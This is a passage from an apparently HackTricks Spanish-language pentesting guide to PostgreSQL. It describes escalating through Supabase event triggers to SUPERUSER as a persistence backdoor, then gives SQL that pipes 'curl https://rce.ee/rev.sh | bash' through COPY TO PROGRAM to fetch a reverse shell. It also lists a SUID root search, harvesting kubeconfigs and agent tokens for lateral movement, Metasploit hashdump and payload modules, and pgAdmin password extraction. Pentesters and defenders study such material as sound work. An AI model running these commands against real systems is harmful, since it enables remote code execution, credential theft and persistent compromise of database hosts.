El intento de Supabase de omitir unsafe triggers solo comprueba la propiedad, por lo que asegúrate de que el trigger function owner sea tu rol de bajo privilegio, pero el payload solo se ejecuta cuando el hook cambia `current_user` a SUPERUSER. Debido a que el trigger se vuelve a ejecutar ante futuros DDL, también actúa como una self-healing persistence backdoor siempre que el proveedor eleve brevemente los tenant roles.
### Convertir un acceso SUPERUSER transitorio en host compromise
Después de que `SET ROLE priv_esc;` tenga éxito, vuelve a ejecutar las primitivas bloqueadas anteriormente:
```sql
INSERT INTO public.ai_models(model_name, config)
VALUES ('hostname', to_jsonb(pg_read_file('/etc/hostname', 0, 100)));
COPY (SELECT '') TO PROGRAM 'curl https://rce.ee/rev.sh | bash';
pg_read_file/COPY ... TO PROGRAM ahora proporcionan acceso arbitrario a archivos y ejecución de comandos como la cuenta OS de la base de datos. Siga con la escalada de privilegios estándar en el host:
find / -perm -4000 -type f 2>/dev/null
Abusar de un binario SUID mal configurado o de una writable config otorga root. Una vez con root, recopila orchestration credentials (systemd unit env files, /etc/supabase, kubeconfigs, agent tokens) para pivot laterally a través de la región del proveedor.
POST
msf> use auxiliary/scanner/postgres/postgres_hashdump
msf> use auxiliary/scanner/postgres/postgres_schemadump
msf> use auxiliary/admin/postgres/postgres_readfile
msf> use exploit/linux/postgres/postgres_payload
msf> use exploit/windows/postgres/postgres_payload
registro
Dentro del archivo postgresql.conf puedes habilitar los logs de postgresql modificando:
log_statement = 'all'
log_filename = 'postgresql-%Y-%m-%d_%H%M%S.log'
logging_collector = on
sudo service postgresql restart
#Find the logs in /var/lib/postgresql/<PG_Version>/main/log/
#or in /var/lib/postgresql/<PG_Version>/main/pg_log/
Luego, reinicia el servicio.
pgadmin
pgadmin es una plataforma de administración y desarrollo para PostgreSQL.
Puedes encontrar contraseñas dentro del archivo pgadmin4.db.
Puedes descifrarlas usando la función decrypt dentro del script: https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py
sqlite3 pgadmin4.db ".schema"
sqlite3 pgadmin4.db "select * from user;"
sqlite3 pgadmin4.db "select * from server;"
string pgadmin4.db
pg_hba
La autenticación de clientes en PostgreSQL se gestiona mediante un archivo de configuración llamado pg_hba.conf. Este archivo contiene una serie de registros, cada uno especificando un tipo de conexión, rango de direcciones IP del cliente (si aplica), nombre de la base de datos, nombre de usuario y el método de autenticación a usar para las conexiones coincidentes. Se utiliza el primer registro que coincide con el tipo de conexión, la dirección del cliente, la base de datos solicitada y el nombre de usuario. No hay un fallback o respaldo si la autenticación falla. Si ningún registro coincide, se niega el acceso.
Los métodos de autenticación basados en contraseña disponibles en pg_hba.conf son md5, crypt y password. Estos métodos difieren en cómo se transmite la contraseña: con hash MD5, encriptada con crypt o en texto claro. Es importante notar que el método crypt no puede usarse con contraseñas que hayan sido cifradas en pg_authid.
Enumeración local en Linux
Con acceso a shell, PostgreSQL suele tratarse más de auth policy, socket access, y credential artifacts que de la exposición TCP directa.
Rutas y archivos de alto interés:
find /etc/postgresql -maxdepth 4 -type f \( -name "postgresql.conf" -o -name "pg_hba.conf" \) 2>/dev/null
ls -l /var/run/postgresql/.s.PGSQL.5432 ~/.pgpass 2>/dev/null
Ajustes importantes y su significado:
listen_addressescontrola a qué interfaces se enlaza PostgreSQL ('*'significa todas)peerasocia al OS user local con un rol de DB en sockets UNIXtrustpermite el acceso sin contraseña para reglas que coincidan
Comprobaciones rápidas:
rg -n "^(host|local)|trust|peer|md5|scram|password|ssl" /etc/postgresql 2>/dev/null
sudo -u postgres psql -c 'SHOW hba_file; SHOW config_file;' 2>/dev/null
sudo -u postgres psql -c '\du' 2>/dev/null
Qué buscar:
trustentries fuera de un contexto de laboratorio/desarrollo- mapeos permisivos
peerque convierten el acceso al SO en administrador de la BD - permisos débiles en
~/.pgpass - roles con
SUPERUSER,CREATEDB,REPLICATION, oBYPASSRLS
Referencias
- SupaPwn: Hacking Our Way into Lovable’s Office and Helping Secure Supabase
- HTB: DarkCorp by 0xdf
- PayloadsAllTheThings: PostgreSQL Injection - Using COPY TO/FROM PROGRAM
- Postgres SQL injection to RCE with archive_command (The Gray Area)
Tip
Aprende y practica Hacking en AWS:
HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica Hacking en GCP:HackTricks Training GCP Red Team Expert (GRTE)
Aprende y practica Hacking en Azure:
HackTricks Training Azure Red Team Expert (AzRTE)
Apoya a HackTricks
- Revisa los planes de suscripción!
- Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
- Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repositorios de github.


